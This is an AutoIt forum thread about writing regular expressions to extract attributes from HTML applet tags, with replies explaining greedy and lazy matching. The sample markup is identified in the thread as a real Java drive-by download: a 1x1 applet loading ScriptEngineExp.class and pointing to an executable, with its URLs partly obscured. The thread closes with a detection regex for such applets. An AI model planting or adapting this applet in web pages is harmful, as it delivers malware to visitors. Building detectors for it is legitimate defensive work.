DeltaRocked

Regex for applet


hello,

I need help writing a single regex for the following:

<body>
<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">
<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>
</applet>
</body>

I am presently using four different regexes on the string above, starting with the applet archive attribute: I need to retrieve the URL, code, width and height.

Secondly, there can be multiple applets, so I extract the text from <applet to /applet> and then run the four regexes on it.

applet_archive= (?i)(?:<[\s*]{0,1}applet[^>]*)archive[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_class= (?i)(?:<[\s*]{0,1}applet[^>]*)code[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_width= (?i)(?:<[\s*]{0,1}applet[^>]*)width[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_height= (?i)(?:<[\s*]{0,1}applet[^>]*)height[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
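For comparison, here is a minimal Python sketch of the same two-step approach (isolate each applet tag, then read its attributes) using one attribute pattern instead of four. It uses Python's `re` module rather than AutoIt's `StringRegExp`; the constructs involved (alternation, lazy and negated character classes, case-insensitive matching) should behave the same way in PCRE for this input. The names `APPLET_TAG`, `ATTRIBUTE` and `parse_applets` are hypothetical, and the sketch assumes no attribute value contains a literal `>`.

```python
import re

# Matches each opening <applet ...> tag, case-insensitively, tolerating "< applet".
# Assumption: no attribute value contains a literal ">".
APPLET_TAG = re.compile(r'<\s*applet\b([^>]*)>', re.IGNORECASE)

# One pattern for all four attributes. The value may be double-quoted,
# single-quoted or unquoted; exactly one of groups 2-4 takes part in a match.
ATTRIBUTE = re.compile(
    r'''\b(archive|code|width|height)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))''',
    re.IGNORECASE,
)


def parse_applets(html):
    """Return one {attribute: value} dict per <applet> opening tag."""
    applets = []
    for tag in APPLET_TAG.finditer(html):
        attrs = {}
        for m in ATTRIBUTE.finditer(tag.group(1)):
            # Keep whichever of the three value groups actually matched.
            value = next(g for g in m.groups()[1:] if g is not None)
            attrs[m.group(1).lower()] = value
        applets.append(attrs)
    return applets
```

Because the attribute names are captured along with the values, the order of the attributes inside the tag does not matter; for the sample in the question, `parse_applets(html)[0]['code']` is `'ScriptEngineExp.class'`.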


Are the parameters always the same?

#include<Array.au3>
$str = '<body>' & @CRLF & _
'<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
'<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>' & @CRLF & _
'</applet>' & @CRLF & _
'</body>'
$re = StringRegExp($str, '"(.*?)"', 3)
_ArrayDisplay($re)
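The same "grab every quoted string" idea can be sketched with Python's `re.findall` (a stand-in for `StringRegExp` with flag 3, assumed to behave equivalently here). It shows why the question about fixed parameters matters: the values come back purely by position, and the attribute names are not captured.

```python
import re

# The HTML from the question: one applet plus its <param> element.
html = ('<body>\n'
        '<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" '
        'code="ScriptEngineExp.class" width="1" height="1">\n'
        '<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>\n'
        '</applet>\n'
        '</body>')

# Lazy (.*?) stops at the next double quote, so every quoted value is
# returned in document order, including the <param> values.
quoted_values = re.findall(r'"(.*?)"', html)
print(quoted_values)
```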

Scripts & functions Organize Includes Let Scite organize the include files

Yahtzee The game "Yahtzee" (Kniffel, DiceLion)

LoginWrapper Secure scripts by adding a query (authentication)

_RunOnlyOnThis UDF Make sure that a script can only be executed on ... (Windows / HD / ...)

Internet-Café Server/Client Application Open CD, Start Browser, Lock remote client, etc.

MultipleFuncsWithOneHotkey Start different funcs by hitting one hotkey different times


Or even something like this:

#include<Array.au3>
$str = '<body>' & @CRLF & _
  '<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
  '<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>' & @CRLF & _
  '</applet>' & @CRLF & _
  '</body>'
ConsoleWrite(StringRegExpReplace($str, '(?s).*archive="(.*?)".*code="(.*?)".*width="(\d+)".*height="(\d+)".*', 'archive: $1' & @CRLF & 'class: $2' & @CRLF & 'width: $3' & @CRLF & 'height: $4') & @LF)
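The replace trick works because `(?s)` lets `.` cross line breaks, so the leading and trailing `.*` consume the whole input and the replacement template becomes the entire result. A Python sketch of the same idea with `re.sub` (assumed equivalent to `StringRegExpReplace` for this pattern; Python writes back-references as `\1` rather than `$1`):

```python
import re

html = ('<body>\r\n'
        '<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" '
        'code="ScriptEngineExp.class" width="1" height="1">\r\n'
        '</applet>\r\n'
        '</body>')

# (?s) makes . match CR/LF too, so the outer .* swallow everything
# around the four captured values and only the template remains.
pattern = r'(?s).*archive="(.*?)".*code="(.*?)".*width="(\d+)".*height="(\d+)".*'
report = re.sub(pattern, r'archive: \1\nclass: \2\nwidth: \3\nheight: \4', html)
print(report)
```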


deltarocked,

I am trying to get the hang of regexps, so I thought I would take a whack at this. I came up with the following:

StringRegExp($Value, 'archive="(.*?)"|code="(.*?)"|width="(.*?)"|height="(.*?)"', 3)
However, it returns an array with blank elements between the results I expect. I hope this helps, and that one of the regex mavens will enlighten us (jeez, watching too much television).

kylomas

edit: additional data

I'm using the regex tester by szhlopp found at http://www.autoitscript.com/forum/topic/...ester-v2/page__view__findpost_

edit2: I figured out that the problem is the space delimiting the pattern, but I do NOT know how to NOT return the space as a match.


Forum Rules         Procedure for posting code

"I like pigs.  Dogs look up to us.  Cats look down on us.  Pigs treat us as equals."

- Sir Winston Churchill


kylomas wrote:
StringRegExp($Value, 'archive="(.*?)"|code="(.*?)"|width="(.*?)"|height="(.*?)"', 3)
However, it returns an array with blank elements between the results that I expect.

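In this case the 'or' operator | is not appropriate: each alternative fills only its own capture group, so every match comes back with the other groups empty, which is where the blank elements come from. You should use wildcards between the parts to be captured instead.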

Like this

$aResult=StringRegExp($str, 'archive="([^"]*).*code="([^"]*).*width="([^"]*).*height="([^"]*)', 3)

or this

$aResult=StringRegExp($str, 'archive="(.*?)".*code="(.*?)".*width="(.*?)".*height="(.*?)"', 3)
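To see the difference between the two approaches, here is a small Python sketch (Python's `re.findall` is used as a stand-in; like AutoIt's flag 3, it reports groups that did not take part in a match as empty strings). The alternation yields four matches, each with only one filled group; the wildcard sequence yields a single match with all four groups filled.

```python
import re

tag = ('<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" '
       'code="ScriptEngineExp.class" width="1" height="1">')

# Alternation: one match per attribute; the groups of the branches
# that did not match come back as empty strings.
alternation = re.findall(
    r'archive="(.*?)"|code="(.*?)"|width="(.*?)"|height="(.*?)"', tag)

# Sequence with wildcards: one match that fills all four groups.
sequence = re.findall(
    r'archive="(.*?)".*code="(.*?)".*width="(.*?)".*height="(.*?)"', tag)

print(alternation)
print(sequence)
```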

"Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the universe trying to build bigger and better idiots. So far, the universe is winning."- Rick Cook


Apologies to DeltaRocked for intruding...

@Bowmore,

When I use pattern #2 it works perfectly, however, when I do this

archive=(.*?).*code=(.*?).*width=(.*?)
intending to get the same strings including the quotes, I get two blank elements and a match on the third. ???

kylomas

edit: I think this is because I do NOT have a terminating delimiter, but how do I include the quotes and use the quotes as the terminator?

edit2: got it by doing this

archive=(".*?").*code=(".*?")
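The reason the terminator matters can be checked with a short Python sketch (Python's `re`, assumed to follow the same backtracking rules as PCRE here). A lazy group with nothing after it that forces it to grow matches the empty string, because the following `.*` (or the end of the pattern) can do all the work. Putting the quotes inside the group gives the lazy part something it must reach.

```python
import re

tag = ('<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" '
       'code="ScriptEngineExp.class" width="1" height="1">')

# No terminator: each lazy (.*?) is satisfied by zero characters.
unterminated = re.search(r'archive=(.*?).*code=(.*?).*width=(.*?)', tag).groups()

# Quotes inside the group: the lazy part must run to the closing quote.
terminated = re.search(r'archive=(".*?").*code=(".*?")', tag).groups()

print(unterminated)
print(terminated)
```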

Don't forget the question mark where it's needed, either. It doesn't matter in this particular case, but it is worth knowing.

You see, by default, PCRE is "greedy", which means that an unlimited repetition (+ or * or {n,}) will match the longest string possible. This is particularly important when .* is used.

E.g. the pattern '(.*)abc' applied to 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz'

matches 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabc'

In other words, PCRE makes .* match the longest string that still doesn't cause the rest of the pattern to fail.

Now use a non-greedy pattern by applying the ? qualifier (which is not the same as the ? "optional" modifier, a synonym of {0,1}) and things change:

the pattern '(.*?)abc' applied to 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz' matches 'xxxxxxxxxxxxxabc'

that is the shortest string that still doesn't cause the rest of the pattern to fail.
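The greedy/lazy example above can be reproduced in a few lines of Python (Python's `re` treats `.*` and `.*?` the same way PCRE does for this case):

```python
import re

s = 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz'

# Greedy: .* grabs as much as possible, then gives back just enough
# for 'abc' to match, so the match ends at the LAST 'abc'.
greedy = re.match(r'(.*)abc', s).group(0)

# Lazy: .*? grabs as little as possible, so the match ends at the FIRST 'abc'.
lazy = re.match(r'(.*?)abc', s).group(0)

print(greedy)
print(lazy)
```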

So in the above post, when you have archive=(".*?").*code=(".*?") you rely on the line not having more than one occurrence of code=.

Otherwise you find yourself in the first situation above (too greedy). This may in fact happen, since line breaks between HTML tags are completely insignificant: there may be none or many.
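A Python sketch of that failure, using two hypothetical applets (`a.jar`, `b.jar` and their class names are made up for illustration) written on a single line. The greedy `.*` runs past the end of the first tag and pairs the first archive with the second applet's class. One common fix, swapped in here as an illustration, is `[^>]*`, which cannot leave the current tag.

```python
import re

# Two hypothetical applets with no line break between them (legal HTML).
html = ('<applet archive="a.jar" code="A.class" width="1" height="1"></applet>'
        '<applet archive="b.jar" code="B.class" width="300" height="200"></applet>')

# Greedy .* backtracks from the end of the string to the LAST code=,
# so one mixed-up pair is returned and the second applet is consumed.
too_greedy = re.findall(r'archive="(.*?)".*code="(.*?)"', html)

# [^>]* stops at the end of the current tag, so each applet is paired correctly.
per_tag = re.findall(r'archive="(.*?)"[^>]*code="(.*?)"', html)

print(too_greedy)
print(per_tag)
```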


This wonderful site allows debugging and testing regular expressions (many flavors available). An absolute must have in your bookmarks.
Another excellent RegExp tutorial. Don't forget to download your up-to-date copy of pcretest.exe and pcregrep.exe here
RegExp tutorial: enough to get started
PCRE v8.33 regexp documentation latest available release and currently implemented in AutoIt beta.

SQLitespeed is another feature-rich premier SQLite manager (includes import/export). Well worth a try.
SQLite Expert (freeware Personal Edition or payware Pro version) is a very useful SQLite database manager.
An excellent eBook covering almost every aspect of SQLite3: a must-read for anyone doing serious work.
SQL tutorial (covers "generic" SQL, but most of it applies to SQLite as well)
A work-in-progress SQLite3 tutorial. Don't miss other LxyzTHW pages!
SQLite official website with full documentation (may be newer than the SQLite library that comes standard with AutoIt)


hello everybody,

A little bit of history about this snippet: it is actual, working drive-by download HTML code. All Java-based drive-by downloads have the same syntax, but nothing can be said about the positions of the attributes or the line feeds and spaces between them.

code="ScriptEngineExp.class" width="1" height="1"

These 3 parameters are a giveaway that this is malicious code.

Logical reasoning: width and height cannot be 1, or less than 50, unless the intent is malicious, because these dimensions are what the user sees.

ScriptEngineExp.class is a Java class which executes commands. :)

The individual regexes I have written essentially cover all the tricks used by hackers, so that each returns the exact value irrespective of whether ", ' or no quotes are used, because any of these can be used in HTML and the page still gets parsed.
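The quote-agnostic matching and the size heuristic described above can be combined in a short Python sketch. It uses a backreference (`\1`) so the closing quote must be the same as the opening one, or absent when the value is unquoted. The function names `attr_pattern` and `looks_hidden`, and the rule "flag the tag if either dimension is below 50", are hypothetical: they are one reading of the heuristic, not DeltaRocked's regexes. It also assumes attribute values contain no spaces.

```python
import re


def attr_pattern(name):
    # Group 1 is the opening quote (", ' or nothing); \1 demands the same
    # character after the value, so mismatched quotes do not match.
    # Assumption: values contain no whitespace, quotes or ">".
    return re.compile(r'\b' + name + r'\s*=\s*(["\']?)([^"\'\s>]+)\1', re.IGNORECASE)


WIDTH = attr_pattern('width')
HEIGHT = attr_pattern('height')


def looks_hidden(tag, limit=50):
    """Hypothetical heuristic: True if width or height is below `limit` pixels."""
    sizes = []
    for pattern in (WIDTH, HEIGHT):
        m = pattern.search(tag)
        if m is None or not m.group(2).isdigit():
            return False  # missing or non-numeric size: not flagged by this rule
        sizes.append(int(m.group(2)))
    return min(sizes) < limit
```

For example, `looks_hidden('<applet code=Game.class width=300 height=200>')` is `False`, while the sample tag from the question (width="1" height="1") is flagged.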

Thanks again for the efforts and the discussion.

Regards

Deltarocked


Try this one

(?i)code=[\x22\x27]?script.+?\.class[\x22\x27]?\s*width=[\x22\x27]?\d[\x22\x27]?\s*height=[\x22\x27]?\d[\x22\x27]?

I could probably shorten it down but it should work as is.
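Here is a quick Python check of George's pattern, with the backslashes that the forum appears to have stripped written back in (`\x22` is `"`, `\x27` is `'`, plus `\s`, `\d` and `\.`). That restoration is an assumption. Note that `\d` accepts exactly one digit, so only single-digit widths and heights are flagged.

```python
import re

# Backslashes restored by assumption; (?i) makes "script" match "Script".
SUSPECT = re.compile(
    r'(?i)code=[\x22\x27]?script.+?\.class[\x22\x27]?\s*width=[\x22\x27]?\d[\x22\x27]?\s*'
    r'height=[\x22\x27]?\d[\x22\x27]?'
)

sample = ('<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" '
          'code="ScriptEngineExp.class" width="1" height="1">')
print(SUSPECT.search(sample) is not None)
```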


George

Question about decompiling code? Read the decompiling FAQ and don't bother posting the question in the forums.

Be sure to read and follow the forum rules. -AKA the AutoIt Reading and Comprehension Skills test.***

The PCRE (Regular Expression) ToolKit for AutoIT - (Updated Oct 20, 2011 ver:3.0.1.13) - Please update your current version before filing any bug reports. The installer now includes both 32 and 64 bit versions. No change in version number.

Visit my Blog .. currently not active but it will soon be resplendent with news and views. Also please remove any links you may have to my website. it is soon to be closed and replaced with something else.

"Old age and treachery will always overcome youth and skill!"
